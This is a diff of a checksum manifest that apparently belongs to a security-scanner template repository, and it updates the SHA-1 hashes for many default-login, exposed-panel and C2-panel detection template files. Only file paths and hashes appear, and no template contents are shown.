http/default-logins/nagios/nagiosxi-default-login.yaml:60ae84bfb173f6a3851c97e22fb4cbab0b540c6f http/default-logins/netsus/netsus-default-login.yaml:8979ce668c655546a5ab1ae6252ccca18f7da07a -http/default-logins/next-terminal/next-terminal-default-login.yaml:bb35301c6a8ebaf435d260bfa69ee6ce8ffff90c +http/default-logins/next-terminal/next-terminal-default-login.yaml:9196f6d907ad55ef9dcff52207e37dd6d0f06c76 http/default-logins/nexus/nexus-default-login.yaml:8041be21504ba54971e8b36ab505890e8117bece http/default-logins/node-red/nodered-default-login.yaml:63047dac792178afae65bca7b9c3ee1818402629 http/default-logins/nps/nps-default-login.yaml:7ce66f9f9d21efbb11af4aea88d07d0546aed856 @@ -3455,7 +3455,7 @@ http/default-logins/others/supershell-default-login.yaml:a838878b8d6b3bf44662292 http/default-logins/others/telecom-gateway-default-login.yaml:2e09596822f3a71579d9d6eeebcd911a7e2d2ace http/default-logins/paloalto/panos-default-login.yaml:8112483d459c35b60fe939b9302cc2c24a6fccd1 http/default-logins/panabit/panabit-default-login.yaml:716127317efff1f20eafc1ca729de249d15b7b28 -http/default-logins/pentaho/pentaho-default-login.yaml:35b3d5704b6ed25febcdd69bee69829702878247 +http/default-logins/pentaho/pentaho-default-login.yaml:7f62c3d2ad3700e9ca597fb2d45b290376810e87 http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml:e0a11721f2d1926506b1207e62966aa3b5412685 http/default-logins/powerjob-default-login.yaml:e6467f6399b1787f4ae84c64cd1bef121c456b7f http/default-logins/powershell/powershell-default-login.yaml:977536a30d22da42d1ab8865b0d765d7e8da53a7 @@ -3481,15 +3481,15 @@ http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdac http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 -http/default-logins/soplanning/soplanning-default-login.yaml:61057d6002c2c34977a7bb264064b9bd90f9307e +http/default-logins/soplanning/soplanning-default-login.yaml:9dd6374926b7082e82edbb5648a508524d37d2e2 http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7 http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40 http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c http/default-logins/steve/steve-default-login.yaml:c0201d124a9cb45a95329d12f3321df228c43630 -http/default-logins/structurizr/structurizr-default-login.yaml:321b2add36b7411c057d215594292834cbdabe1d +http/default-logins/structurizr/structurizr-default-login.yaml:005828444dc00ddc1d3f88a4b68c5f0520b93019 http/default-logins/supermicro/supermicro-default-login.yaml:1795c26b29040cb74d72843237c8c1c65d153833 http/default-logins/szhe/szhe-default-login.yaml:0063e1b2cc9e3247cc5f9a737c087f6e85c0a001 -http/default-logins/timekeeper/timekeeper-default-login.yaml:1b5797b8780e698e7883baa9c214109ef1cfed58 +http/default-logins/timekeeper/timekeeper-default-login.yaml:a8680d3ee2a69c286fef6f9d393446be106ca2c5 http/default-logins/tiny-file-manager-default-login.yaml:e8fb475d5569568291015956b0f2c66a4a1128cf http/default-logins/tooljet/tooljet-default-login.yaml:18d5e3f549906c28523ba6872ee051ed92df0bc4 http/default-logins/trassir/trassir-default-login.yaml:cbf62608f47efbff9049cd9540611ae4a0a23e51 @@ -3500,7 +3500,7 @@ http/default-logins/vidyo/vidyo-default-login.yaml:1022791dbb1f5128577c384b14cb5 http/default-logins/viewpoint/trilithic-viewpoint-login.yaml:b001db8da3f85c1e0d0cb551fe69fcef5083d6cd http/default-logins/visionhub/visionhub-default-login.yaml:b56eb860c30e4d0c611392437e18245ae6d994fa http/default-logins/wayos/ac-weak-login.yaml:9ac5c6fffbaa09f5459e593e5df4626808733f2a -http/default-logins/wazuh-default-login.yaml:0963c74688a7cb878cec12fda47add666856d67b +http/default-logins/wazuh-default-login.yaml:c1d62ebdc3306aa8c7cea0ecfbfe922457cb1719 http/default-logins/weblogic/weblogic-weak-login.yaml:f619a9c8b20569891ca39be379d0fc4674a379b9 http/default-logins/webmethod/webmethod-integration-default-login.yaml:9c2a188c83f5486402db79336476a2810b8f5aee http/default-logins/webmin-default-login.yaml:7fe6bf9a16301b60194d8527800c413cbe445df0 @@ -3511,1121 +3511,1121 @@ http/default-logins/xerox/xerox7-default-login.yaml:5158227bdfb400df05fbf08175e7 http/default-logins/xnat/xnat-default-login.yaml:f044d249cdc9b51784a6a51aa7a7a59f8ed15f6b http/default-logins/xploitspy/xploitspy-default-login.yaml:db31a4b4ca180e8f2be7e81c1e9f34135bbc222a http/default-logins/xui-weak-login.yaml:b6222285e91d345320907acf58cf5784a0c1a346 -http/default-logins/xxljob/xxljob-default-login.yaml:5b927696d91a5d93d6e72ef3af368a0781bd088c +http/default-logins/xxljob/xxljob-default-login.yaml:3cf8e51b48310ab30bb81c4c361669425f6c98ce http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287040bde60590b27f -http/default-logins/zabbix/zabbix-default-login.yaml:addc8b6d436210926f2dd83a1cace3c72fdb6ab2 +http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 -http/exposed-panels/3cx-phone-management-panel.yaml:962f444db1517bfc6a6a6e6b1718830adb4a733f -http/exposed-panels/3cx-phone-webclient-management-panel.yaml:acaefcf8eab4eca7a6bce9c1955bedfd9c5eeba8 +http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e +http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cca5984 -http/exposed-panels/acemanager-login.yaml:767d4ff238c7d9411738bd97608dfc49a389a608 -http/exposed-panels/acenet-panel.yaml:a7bdd5bef722f284016edcb2dd6c69202a882f26 +http/exposed-panels/acemanager-login.yaml:39b3e50ed6516a6d13303489f640999d9c741d76 +http/exposed-panels/acenet-panel.yaml:d833fa5ec5e28274415714b94935907bef6eaad3 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c -http/exposed-panels/ackee-panel.yaml:a8fad515166d180b18270c842ea52ea7d5f2c13c -http/exposed-panels/acrolinx-dashboard.yaml:ee6d3ea3dc95ef9c7920ad0c4d8097ccb56e784b -http/exposed-panels/acti-panel.yaml:2459ec994303d689f173c2e2dd7da4e61c994f42 -http/exposed-panels/active-admin-exposure.yaml:ab6444819a86a0bc5bfc939250a1f86111a04116 -http/exposed-panels/activemq-panel.yaml:214c9127783602962878dd1b5b3df0995c518bbd -http/exposed-panels/acunetix-login.yaml:2b6114a0ca48f43cfb800bc36e2b58e1d398dcf8 +http/exposed-panels/ackee-panel.yaml:05dcb5b2fe2854e6fa4db27578126f0e91ad30e5 +http/exposed-panels/acrolinx-dashboard.yaml:b5e0df03a31629a5b41a9800ae9269089d4e6f8f +http/exposed-panels/acti-panel.yaml:c4af480c438ca5570216b0d863ad8a661f39596d +http/exposed-panels/active-admin-exposure.yaml:b41431da80b8c319c32977956ef872259d4b09c2 +http/exposed-panels/activemq-panel.yaml:0675006d3342a2ddfee56254376feb15359099f7 +http/exposed-panels/acunetix-login.yaml:bf512b02e3ce26629e30832a4e6cd11b01c0a517 http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 -http/exposed-panels/addonfinance-portal.yaml:e2bbd509c6935dfb63438d444227d40c524f6810 -http/exposed-panels/adhoc-transfer-panel.yaml:1a105d721af5acff0621d0ac21e2b26e28c22a94 -http/exposed-panels/adiscon-loganalyzer.yaml:45d9b9356aee1b3cad07aca495f4211b8276c4b8 -http/exposed-panels/adminer-panel-detect.yaml:8bbbd5e809281cd9348c839183bda14179f472e7 -http/exposed-panels/adminer-panel.yaml:e388258c0af3c9ee3113044c9f10e6e4495494f4 -http/exposed-panels/adminset-panel.yaml:f1bb5d8a3cf287e556f1ed365704ed69bba73f93 -http/exposed-panels/adobe/adobe-component-login.yaml:edffeb9320f33034177b57bccb9ba3a435e87952 -http/exposed-panels/adobe/adobe-connect-central-login.yaml:f7411012c78bfabdd304746a29d09843c4959971 -http/exposed-panels/adobe/adobe-experience-manager-login.yaml:50e79afd8faa107b9f41d6e0ada2348a395d6cba +http/exposed-panels/addonfinance-portal.yaml:28a7f3d98134a544c4c8bce4153606da4ea7da78 +http/exposed-panels/adhoc-transfer-panel.yaml:d865eadf819552085319ebae3057f45afc659d24 +http/exposed-panels/adiscon-loganalyzer.yaml:ad4702b4089560080d43afd9c1b6dd643ca7b9bb +http/exposed-panels/adminer-panel-detect.yaml:411ab492b25f6a7fa2c56b7aae4deb3877903e72 +http/exposed-panels/adminer-panel.yaml:abfc4718a29f36cf5ccdf11b34285357bd986dbc +http/exposed-panels/adminset-panel.yaml:d97fd22071d3f6b84116fdd0672d684927694793 +http/exposed-panels/adobe/adobe-component-login.yaml:4cb0f236639902bb8a0c2849c12d0a43fd5f49e5 +http/exposed-panels/adobe/adobe-connect-central-login.yaml:831fad6612db3b206d05914fff44de6455063637 +http/exposed-panels/adobe/adobe-experience-manager-login.yaml:cefe89e14fa3874fd7df2f3d25e1ae670b9cae59 http/exposed-panels/adobe/adobe-media-server.yaml:b916d4fa9a0d1966e18b42a850154f1a66563020 -http/exposed-panels/adobe/aem-crx-package-manager.yaml:4e9af6c8fd14b053a9a4bfbbaf13ea253ad11456 -http/exposed-panels/adobe/aem-sling-login.yaml:d118a32d9092eef6bb528adaa3943db34ebd8ee7 +http/exposed-panels/adobe/aem-crx-package-manager.yaml:80a8fdeb314801820dc1cb58559a22ddcacf4e52 +http/exposed-panels/adobe/aem-sling-login.yaml:d638f7b77c3275f2f85c08caf575afffa1ecf3fe http/exposed-panels/advance-setup.yaml:962911eb49a56355a94abf4fd7ac33a0febd7002 http/exposed-panels/aerohive-netconfig-ui.yaml:521d33561c7483fa80b401a3836027322e264c7e http/exposed-panels/afterlogic-webmail-login.yaml:32be3f18ab5d14eecf44fe540c77955ab37b7b30 -http/exposed-panels/aircube-dashboard-panel.yaml:42344a2f0c7a57240b69c274ee8f6a17605732e2 -http/exposed-panels/aircube-login.yaml:18f9d2c98c9d6bf51426747e516ac279955fd9ac -http/exposed-panels/airflow-panel.yaml:d0615086ebcf18d5be814d2c378a72766a90173c -http/exposed-panels/airnotifier-panel.yaml:b99b43efa16656c9818965e373513fc45f439f94 -http/exposed-panels/akamai-cloudtest.yaml:6604266f5bf62a25b60020ca1c7542c8b27b1cdf +http/exposed-panels/aircube-dashboard-panel.yaml:5deb62ca63e4ce4263e20f3a93fbffdc20bb5e38 +http/exposed-panels/aircube-login.yaml:997067e6d3fb5697d4625de1d6371feecbe871a6 +http/exposed-panels/airflow-panel.yaml:b06498b69d501b0a04b09975933d296ffffffe8c +http/exposed-panels/airnotifier-panel.yaml:5fc191814fe875b546f99de15d2b3545b7ef98dd +http/exposed-panels/akamai-cloudtest.yaml:fca8d8183dbe1807070574cfccb0068ec1acd2a3 http/exposed-panels/akhq-panel.yaml:225c16f11b7c067a4c58ffdb85bd9f67bb34c044 -http/exposed-panels/alfresco-detect.yaml:15b88d0e58c7d1e6b16c291ea9b1ce056a002cce -http/exposed-panels/algonomia-panel.yaml:0d3e254fd504e8195196a156eafb3f64d7935d6d +http/exposed-panels/alfresco-detect.yaml:f76075ec4891e6b88bf304c32c4837762f490af1 +http/exposed-panels/algonomia-panel.yaml:1b61636cb4bc3edd04e6c742b44e54fc0474e980 http/exposed-panels/alienvault-usm.yaml:3b8b0250f6fbc636d0c3f3ed1e7fa3a4b77f798d -http/exposed-panels/allied-telesis-exposure.yaml:0088ba6ce885ba100ef070fed6578f4233b9ca44 -http/exposed-panels/ambari-exposure.yaml:83f0dafa0049ad72b019abab623d0aafa6c8716a -http/exposed-panels/amcrest-login.yaml:2f6d0805d7c00f57e00879993e38103962e476ef -http/exposed-panels/ametys-admin-login.yaml:5926dad9cf359115fb82b7316efd5f52cf866e78 -http/exposed-panels/amp-application-panel.yaml:bf778abddd74fa7de05ed30ddb51d8e25647b53e -http/exposed-panels/ampache-panel.yaml:0d28188dcccf400fbe3ac064813a842190574bc2 +http/exposed-panels/allied-telesis-exposure.yaml:128c902f08a6e2f51a2295da17c61601de3bc7bd +http/exposed-panels/ambari-exposure.yaml:129c51cd426b5d7faeb6580fcb621eeb5d57a527 +http/exposed-panels/amcrest-login.yaml:a207217a6a58cb8b2a287be3eea71e92ecf87968 +http/exposed-panels/ametys-admin-login.yaml:886034bb8f5addc4bfb5acc5c3217d1fc0702240 +http/exposed-panels/amp-application-panel.yaml:1e738a1ec1a48454f16ba7d720d906aec6f38b91 +http/exposed-panels/ampache-panel.yaml:3dbea48e6bd186bfd8534de12d0d8d14c8547a6e http/exposed-panels/ampps-admin-panel.yaml:e0f16ce05eb991824f64503f4b45c9dbecfc828d http/exposed-panels/ampps-panel.yaml:a0a85553bc90215dbb676f0a2e0086b6242fd3a1 -http/exposed-panels/amprion-gridloss-panel.yaml:e3385be2e1d363ef00afba49c16e3ceac2169a35 -http/exposed-panels/anaqua-login-panel.yaml:1726b29bfd6159dccf30d591f670665d43740183 +http/exposed-panels/amprion-gridloss-panel.yaml:188ee0982a1f8acb4f539376f7345750cfd662f3 +http/exposed-panels/anaqua-login-panel.yaml:1cedd9bc44fce306dcee81d9d7b458a5b6f122aa http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 -http/exposed-panels/ansible-tower-exposure.yaml:e1220a24035bac69c906b46366c459e8b41d2a99 -http/exposed-panels/apache/apache-apisix-panel.yaml:74cd7d5e66964c27229f390eb52aa10b4802d46f -http/exposed-panels/apache/apache-mesos-panel.yaml:10e2bbd53e98f6977a960b63272d94eae82359e1 -http/exposed-panels/apache/public-tomcat-manager.yaml:58b066b6fea20fea447784de77b3085f8f85ceb4 -http/exposed-panels/apache-jmeter-dashboard.yaml:a6913f3b4c1b6622707fed4d7da3e88c0913454b -http/exposed-panels/apigee-panel.yaml:a60ad7642fdc480e7d5b56e5251edabedd276cf9 +http/exposed-panels/ansible-tower-exposure.yaml:ecb6ec8de956656024905379c2a942e39292d02b +http/exposed-panels/apache/apache-apisix-panel.yaml:bb450193e4bb5cab9462c5776ffe1406890779e0 +http/exposed-panels/apache/apache-mesos-panel.yaml:50070584a2290a596afb1f2df713ed58c9f08c71 +http/exposed-panels/apache/public-tomcat-manager.yaml:b09181c5fb371755c05e371c4dde009b27647311 +http/exposed-panels/apache-jmeter-dashboard.yaml:f046007d3840b1bfe603507065cc0f53b3a51cf6 +http/exposed-panels/apigee-panel.yaml:cacf291df4af52f66cc1118b309f7045eefe699c http/exposed-panels/apiman-panel.yaml:792e85ffecba966d6ff122f7ab1c6c9d6899c5aa -http/exposed-panels/appsmith-web-login.yaml:f5695ee85e7209785e0f6520057e5986e828a1ad -http/exposed-panels/appspace-panel.yaml:9efc67ff02c01219db47dbbfa1a4c4fa382995d7 -http/exposed-panels/appsuite-panel.yaml:ae0cd5edef9f9ce43b2addeb235a76c5fecfb5ef -http/exposed-panels/appwrite-panel.yaml:a2f47a398ec622212fe407c0cfe26a323a4c47f9 +http/exposed-panels/appsmith-web-login.yaml:250068819038ad0362496d95475be7b9442cbe10 +http/exposed-panels/appspace-panel.yaml:1690c5003a9f5ca0b11ad5f5fd4d8c5fd0873440 +http/exposed-panels/appsuite-panel.yaml:421f4676d83a3988a07c81c03b608f26d49a2068 +http/exposed-panels/appwrite-panel.yaml:12c220eebdcc64a05bfbb57d367107e63c697e19 http/exposed-panels/aptus-panel.yaml:36678e2013d4dcc6f9a20e1da339c90a58efe911 -http/exposed-panels/aqua-enterprise-panel.yaml:5711a0109255990a3dfd13b239251c84a6a2114e -http/exposed-panels/arangodb-web-Interface.yaml:0d80026c2e9c5a843edd33ffc5428869016883fc -http/exposed-panels/arcgis/arcgis-panel.yaml:ad5833ebac287faeeb276b7ad6b256b39cfdab58 -http/exposed-panels/arcgis/arcgis-services.yaml:0d6245753f01c7c932152fd5c85f95c44bb98867 -http/exposed-panels/archibus-webcentral-panel.yaml:c4ee6956765285f1f7c7309e224d1148d6430fa1 -http/exposed-panels/arcserve-panel.yaml:23e4c3ce985ce94a70dbad9b7d72bfd37580ee0d +http/exposed-panels/aqua-enterprise-panel.yaml:394accfc420a4b63aed8c25f9197686c4821d7f8 +http/exposed-panels/arangodb-web-Interface.yaml:6e53ac78f6ee2ccca27945e3f15db7008ce67847 +http/exposed-panels/arcgis/arcgis-panel.yaml:c9ec27b32a8754dd9d17cf43373d0be5089f3379 +http/exposed-panels/arcgis/arcgis-services.yaml:952e38a38523e6a4e4611ba8d85164119a093821 +http/exposed-panels/archibus-webcentral-panel.yaml:40c068124398e5d583ce6c8663fdcdb7beec7fa9 +http/exposed-panels/arcserve-panel.yaml:6f128c8d6f8e9f9089df85181e4ce6b003f652ee http/exposed-panels/argocd-login.yaml:d5d4e5e2aa719d7c17487622aa765bafaf48f6ef -http/exposed-panels/arris-modem-detect.yaml:f805ac4a64a32e733e500262a73f87e3cf36d252 -http/exposed-panels/aspcms-backend-panel.yaml:90055663c7ba8e685e68c03e3630eb783a1c9f76 -http/exposed-panels/aspect-control-panel.yaml:a2bc19f99c7aa0487d74a728854cf3868c7cdb16 -http/exposed-panels/asus-aicloud-panel.yaml:c492e05824e3d1733c5aa7cb7137f13f0e039d68 -http/exposed-panels/asus-router-panel.yaml:68595324b66752b68779653c4a648d378c16e37b -http/exposed-panels/atlantis-detect.yaml:21850fca551c43ffdcc2690bdd2d3db6105ce586 -http/exposed-panels/atlassian-bamboo-panel.yaml:427965946d01d7634c4fcca6c47f2bc8cef6f4d7 -http/exposed-panels/atlassian-crowd-panel.yaml:b835f66a835eb10380ea003630c08f81851e1fec +http/exposed-panels/arris-modem-detect.yaml:99bb5ccd983ba4967e78ec81e572389dc6575620 +http/exposed-panels/aspcms-backend-panel.yaml:ecbc06d933ac32c5f70820e7e60c3a8e32969bdc +http/exposed-panels/aspect-control-panel.yaml:a8e0eaa6eab67d532dd8c488c9b124dc69dbbac3 +http/exposed-panels/asus-aicloud-panel.yaml:3e9d7ebe4db1fcb804d1cadaa44da3ca24f52bc2 +http/exposed-panels/asus-router-panel.yaml:7d32c0617a5fd1a39d8970f31879feea72296db2 +http/exposed-panels/atlantis-detect.yaml:026c43041bdb9b313df55a184f4123e544657a01 +http/exposed-panels/atlassian-bamboo-panel.yaml:42c350c7ff51b853320fbaf5e2b99beb90e3cb15 +http/exposed-panels/atlassian-crowd-panel.yaml:ef7a294e49bb4af502a0262630588fadbc03500f http/exposed-panels/atvise-login.yaml:d82919ad17fe05c3e356ff3ffa69537da3dfe60c -http/exposed-panels/audiobookshelf-panel.yaml:51005e6314ed6c44292d50d097893912f91817cc -http/exposed-panels/audiocodes-detect.yaml:2c9e88c041cf64dd146f84957b2751db0724dfa9 -http/exposed-panels/authelia-panel.yaml:ca67e96f61a267c91d1c199cee5a0d9ed0d63810 -http/exposed-panels/automatisch-panel.yaml:a53994c1a5db0815e038ccc37acdb42f37129340 -http/exposed-panels/autoset-detect.yaml:5a84b52d14d5e1e04d29db32bdcfbe014c1b8ce4 -http/exposed-panels/avantfax-panel.yaml:4e8de2087acc6e2a9090191b4e23f7eb7892ea33 +http/exposed-panels/audiobookshelf-panel.yaml:f1a0c10fc68f5dc98e55e56d759db620efe6eb0f +http/exposed-panels/audiocodes-detect.yaml:1b3230863ee4f029db1d9e8be9c773b770ec4021 +http/exposed-panels/authelia-panel.yaml:319338667859842e86b112fd701497c7a0fdf545 +http/exposed-panels/automatisch-panel.yaml:9ec5e61393a9ed31ec6dfe9d533d3f5cf0175bb7 +http/exposed-panels/autoset-detect.yaml:c331b50276b3a5bf0c899c9946f5af53bfdaff3d +http/exposed-panels/avantfax-panel.yaml:703715c6142a0f89c2fe11e289566ca5ecf3835b http/exposed-panels/avatier-password-management.yaml:38996c9eb5b32f11abe87c0cba0b976815d4234c -http/exposed-panels/avaya/avayaaura-cm-panel.yaml:0a0439e772678ba3df943129f4b573dad8b9d911 -http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml:4f0097ef4e358ad20955d93a19263fb95b7eacbc -http/exposed-panels/aviatrix-panel.yaml:656ee7d9231d3fbf761f8dec817824cffae1ad97 -http/exposed-panels/avigilon-panel.yaml:75bcf692640b5f888259844579438ab4502c4327 +http/exposed-panels/avaya/avayaaura-cm-panel.yaml:0d9c9364a84803a2a6ffa34a28c83f372f30ff6c +http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml:31082e72c4a8645c69287a9a590011ea7a14e503 +http/exposed-panels/aviatrix-panel.yaml:76e74103cfe10689fd3eb6dd20a6466991ab00bd +http/exposed-panels/avigilon-panel.yaml:ba2f5f7450d120f9bfcfb5880fdb848af4d98731 http/exposed-panels/avtech-avn801-camera-panel.yaml:dc8e439dfd89e634174026399c12b106d28aaadb http/exposed-panels/avtech-dvr-exposure.yaml:d851894a84fce88810c7a0a1cb51f3d67cdaf3b1 -http/exposed-panels/aws-ec2-autoscale.yaml:73425e4fe6913f293d5f7881cb856a6aea7a5999 -http/exposed-panels/aws-opensearch-login.yaml:4ab95154511db82a50fdef036f9fd12a5e70612e -http/exposed-panels/axel-webserver.yaml:9b944680c791c193d96dbf4dc00a7f9969edf9a2 +http/exposed-panels/aws-ec2-autoscale.yaml:6b77ed04be042ed23dd7645b69bb95cf9d9616fc +http/exposed-panels/aws-opensearch-login.yaml:4820c67b7d20580b8dd5a3da64e8c388b1a08f20 +http/exposed-panels/axel-webserver.yaml:7ce2681f4dfa8812e339c6556620d1ab0686c3a5 http/exposed-panels/axigen-webadmin.yaml:31839f1f552a26aa2b20d6fcc66ab85f0f786a9a http/exposed-panels/axigen-webmail.yaml:9714890d8096cd288876e50e9e5ff571982aeaba -http/exposed-panels/axway-api-manager-panel.yaml:23c43570fa9be182fd0c851813cd15e408aaebe0 -http/exposed-panels/axway-securetransport-panel.yaml:5bbd56d6403ec46b9b102a6e91c71d7b1b0dd137 -http/exposed-panels/axway-securetransport-webclient.yaml:a0e24ec1c4fcf60471cffa062413f66e931b1e7b -http/exposed-panels/axxon-client-panel.yaml:ddb53b9ffd79d6493157ab4abe3440743b0b215b +http/exposed-panels/axway-api-manager-panel.yaml:d32f0100b3f640ca101d47df9d7b4a9badd1ac17 +http/exposed-panels/axway-securetransport-panel.yaml:05271e6b23327265f09fb98057cbaef5c426443a +http/exposed-panels/axway-securetransport-webclient.yaml:73ab7016245745081f277af26300eb3455b4b91e +http/exposed-panels/axxon-client-panel.yaml:4a3e55e217f6b8d7ca31cdaa8724b274447aa0b3 http/exposed-panels/azkaban-web-client.yaml:b2a56dd99826a95f2178f7a5b64ff8c2655cfbe5 http/exposed-panels/backpack/backpack-admin-panel.yaml:e47ae5dd33fe10f06bebcd9a61e6cb186a6fd5fa http/exposed-panels/barracuda-panel.yaml:4a210fef0245e6474e22e175b547422976d8c177 http/exposed-panels/bazarr-login.yaml:07b8b0b2930989f24de751f7138984ea7ff89193 -http/exposed-panels/bedita-panel.yaml:10c2e506a44e540e7dbe3107994ae39bef4b7d0b -http/exposed-panels/beego-admin-dashboard.yaml:de4d5162431c669efa8c81180922a5f3eaf94914 +http/exposed-panels/bedita-panel.yaml:a9b5161ec9456343caa080335c50915588ea3c5f +http/exposed-panels/beego-admin-dashboard.yaml:9efa7d845f8be21a173669630f61f4379b485b88 http/exposed-panels/beyondtrust-login-server.yaml:a10f43fc6e11f61d2bfe063a5bfd1878141549dc http/exposed-panels/beyondtrust-panel.yaml:5f5f9c867a94ed6716efd1f5cb380e817100e294 -http/exposed-panels/beyondtrust-priv-panel.yaml:e43653975199669e0d4825546b8f4a7ff08ccea5 +http/exposed-panels/beyondtrust-priv-panel.yaml:52e544d2868e0f491b954bbc5c0b037972447d8c http/exposed-panels/bigant-login-panel.yaml:272a945bb73fe5487005faf2e04ea0006185dfbe -http/exposed-panels/bigbluebutton-login.yaml:eb9ee9c32e4e99c23cd327f42277450d9c5345c0 -http/exposed-panels/bigfix-login.yaml:d10d86c8b61f007ce5db054f334a8b78107c8739 -http/exposed-panels/bigip-rest-panel.yaml:a7b3e173b5ec0f2fccebfd9c0b1aac79ca7acdfe -http/exposed-panels/biotime-panel.yaml:f6cfd19f7a3056023187360a45789ae5be555a58 -http/exposed-panels/bitdefender-gravityzone.yaml:91ffd2147f5e5179e64e5b5ddda01204070a3ac6 -http/exposed-panels/bitrix-panel.yaml:581cc2bec4a863984c33f63e430928d65e1b5c04 -http/exposed-panels/bitwarden-vault-panel.yaml:9621c469efe8e3b10c039bb097cd609df9041de1 -http/exposed-panels/black-duck-panel.yaml:c88cedc0a81daf01148aaba3a4c377972042993d -http/exposed-panels/bloofoxcms-login-panel.yaml:499a2503bea69c4a216db13c2e41437d423a29a2 +http/exposed-panels/bigbluebutton-login.yaml:b359db87f6e26e9c18ec3c666b329d5c00178990 +http/exposed-panels/bigfix-login.yaml:f41531acc07a367b3af27ddf491e8f9fc203421d +http/exposed-panels/bigip-rest-panel.yaml:df67ddbf1f879c851f780539c86b694a06cfac13 +http/exposed-panels/biotime-panel.yaml:794adf6a9bb074bd96d0537741f482ca898386bb +http/exposed-panels/bitdefender-gravityzone.yaml:48b8a59e5e9eed4d5cd6fe3737bcb49401966c6e +http/exposed-panels/bitrix-panel.yaml:5e9dfb2f68cc3d78dd8d016829452605e85f6496 +http/exposed-panels/bitwarden-vault-panel.yaml:32e21e94cf44e9dc6606050992eab8ab8be48c54 +http/exposed-panels/black-duck-panel.yaml:6d7c628258fc45ee75c6a8d08e3d059e5e358f62 +http/exposed-panels/bloofoxcms-login-panel.yaml:46a611ab43cb580e0294a32a98dd5885d6c99ab8 http/exposed-panels/blue-iris-login.yaml:de1cdc950985e02dcf3602e6323491e211e0a0e2 -http/exposed-panels/bmc/bmc-discovery-panel.yaml:9e9521ee3a4ca257db4080fb8269f11406d2d9a3 -http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:a43930f9aba52ab165cd7bffe76fe22c87ce4f05 +http/exposed-panels/bmc/bmc-discovery-panel.yaml:985669abac56b45a1233b5c32524be9be1c15572 +http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:26096dbbaa080b56269ef625078d07e567090101 http/exposed-panels/bmc-panel-detect.yaml:58bb1fc9aecb78435cfdfd60bd77eafad0cab7d0 -http/exposed-panels/bolt-cms-panel.yaml:5b948be5e94b5973d5c22ab33274970668485114 +http/exposed-panels/bolt-cms-panel.yaml:047791ba5c0f6ea7e061517fa5fa5250ee4ed53f http/exposed-panels/bomgar-login-panel.yaml:4a3abfc3af8fbb6a7cdc1a013aef84451e2b8797 http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e83d67f -http/exposed-panels/bookstack-panel.yaml:15ee36130472773f69fe960e29225455703e01a4 +http/exposed-panels/bookstack-panel.yaml:f900091ea0d3f87d7e111aec5e019c64adf3e79b http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b -http/exposed-panels/buildbot-panel.yaml:7702647e0fc4c89ff8e2f58a585a6973b37b21f1 -http/exposed-panels/busybox-repository-browser.yaml:f1fe6af01b0574b73175c5acaebbb7065d20b5f7 -http/exposed-panels/bynder-panel.yaml:407d80c3397b24387865d35fa1660ce6427f3b03 -http/exposed-panels/c2/ares-rat-c2.yaml:44c77d5bd0bca70e387701befc98adb4d4884a26 -http/exposed-panels/c2/brute-ratel-c4.yaml:d06c97c5d6a6f60e005a264ea3a4285e32d3cc00 -http/exposed-panels/c2/caldera-c2.yaml:2f48e4e9bcf96c29c73224b2c6e66c398067ed41 -http/exposed-panels/c2/covenant-c2.yaml:f00db91e4d2c8c4545b95d35692b0171f6739915 -http/exposed-panels/c2/deimos-c2.yaml:82076dcdb3f8479bb1f2f88cd37bd3abdda83215 -http/exposed-panels/c2/empire-c2.yaml:c6e59c1d68d9e242b0c902b0d210302996ae31dc -http/exposed-panels/c2/evilginx.yaml:976773ba2af295e89b9ea01e504698b2c8392daa -http/exposed-panels/c2/hack5-cloud-c2.yaml:1444463eb49d03653b7e78baf08b83cb95d18c4c -http/exposed-panels/c2/hookbot-rat.yaml:7d3135c0f08ba60f9c9974930a26498cb461156d -http/exposed-panels/c2/meduza-stealer.yaml:223b88f7ec4a3d9228f3cb81c760c9aeac31205e -http/exposed-panels/c2/mystic-stealer.yaml:815a5bc6d8bfe4008140afe1caddc60ffb6991f1 -http/exposed-panels/c2/mythic-c2.yaml:2a559f2eac1542d87650b530e891cccf6f2b12a9 -http/exposed-panels/c2/nh-c2.yaml:f622c7182dbe54d767118645d3b013279a063c52 -http/exposed-panels/c2/pupyc2.yaml:9d2bec110acba3064a615b5a85fa5e737953a3d3 -http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:cf444f1b08edfb80171d7d09f4a8496889c6e861 -http/exposed-panels/c2/supershell-c2.yaml:dc5a0f681f4ca9703c7fd27dcc6adafb4f55b8ce -http/exposed-panels/c2/viper-c2.yaml:5abb8fedea2c1f056c2405aebd6b60a1c8789f1f -http/exposed-panels/cacti-panel.yaml:e02b4bf614c6aef8daf1e61833f8326ee26b6cd3 